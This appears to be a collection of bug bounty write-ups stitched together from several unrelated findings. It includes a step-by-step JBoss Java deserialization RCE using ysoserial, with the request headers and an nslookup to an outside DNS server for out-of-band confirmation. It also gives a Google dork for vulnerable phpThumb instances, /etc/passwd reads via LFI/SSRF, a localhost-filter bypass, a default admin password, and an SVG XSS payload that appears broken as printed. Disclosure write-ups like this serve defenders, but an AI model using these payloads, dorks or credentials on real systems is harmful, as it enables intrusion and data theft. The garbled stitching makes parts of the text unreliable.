Attached is the PDF of how I managed to escalate privileges to staff/superuser privileges via a misconfiguration. Django Privilege Escalation – Zero To Superuser
This is from a private bounty. The internal —-private.com domain was out of scope so I was asked to stop testing once I found the bug.
First off, I would just like to reference the following sites/authors/tools for helping guide me along this route and providing a sweet tool to make this easy:
I ran into a JMXInvokerServlet/EJBInvokerServlet on a private bug bounty. Generally with these, you can just deploy a JSP shell and be done with it. I was running into some issues with this method and I’m not exactly sure why. However, I was still able to get RCE via this version of JBoss (4.2.3) being vulnerable to the Java Deserialization issue. There was egress filtering on this Windows host that didn’t allow me to perform http, ftp, or telnet. I was able to do DNS lookups though which will be shown at the end. I was able to determine it was a windows host due to some file not found-ish error messages.
Steps to Exploit
- Grab a copy of ysoserial
- Dump your payload into a file:
$ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘fake.exe’ > serialdata
- If you’ll notice, I used ‘fake.exe’ as an example. Originally I was running commands like wget, curl, python, perl, etc. and I would receive some errors in the serialized response, “The system cannot find the file specified.”
- To create your POST request for the endpoint use the following headers:
POST /invoker/EJBInvokerServlet HTTP/1.1
ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
- Right click inside the request tab in Repeater and select ‘Paste from file’ and select the file containing serialized data.
- Response (‘cannot find file’ is present):
- I then decided to try cmd.exe
$ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘cmd.exe’ > serialdata
- Response (‘cannot find file’ is not present):
- From these responses, we can gather that I am able to run cmd.exe. At this point I tried a couple ways of outbound connections; however, I was only able to get DNS lookups to work. Thank you @dawgyg for letting me use your DNS server!
$ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘nslookup mealstest.example.com’ > serialtest
- External DNS server logs:
$ sudo tail -f /var/log/messages
Jul 22 00:10:00 server named: client 18x.x.x.x#33347: query: mealstest.example.com IN A -EDC (10.0.5.200)
- I suspect I might have been able to copy over dnscat line by line then run the code. However I am short on time and the RCE was already proven .
Note: I was at one point the top bug reporter for Yahoo! If they do this to me. They are very likely to do this to you.
This was on a private bounty program. I have redacted all the info related to the program. Enjoy!
Originally I just had default administrator credentials then I poked around for less than 10 minutes and found a configuration export which allowed me to export files with root privileges.
Attached pdf for the LFI
Default credentials: admin:aDMIN123#
I initially found this issue on a bounty, however it was marked out of scope on a third party provider. It may be possible to turn this into a RCE. Since I had no reason to escalate since no payment. I’ll leave that up to whoever wants to find out.
Google Dork: inurl:/phpThumb/phpThumb.php?src=
You will see in the response “Unknown image type identified by “root”. It’s reading the /etc/passwd file! However since it only displays the first four characters in the error we can’t read the whole file.
You can also tell it to load remote files http://domain.com/test.php.
This SSRF allowed me to view local files on the host as well as port scan internal hosts.
Reading /etc/passwd using the file protocol.
Brute-forcing for log files using BurpSuite Intruder:
SSRF that had some filtering of 127.0.0.1 and localhost which was bypassed by using 0.0.0.0
This XSS was via embedly which controls the content-type response to image types. Luckily .svg was allowed.
I used this blog to help create a .svg that contained XSS.
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> alert(document.domain); </svg>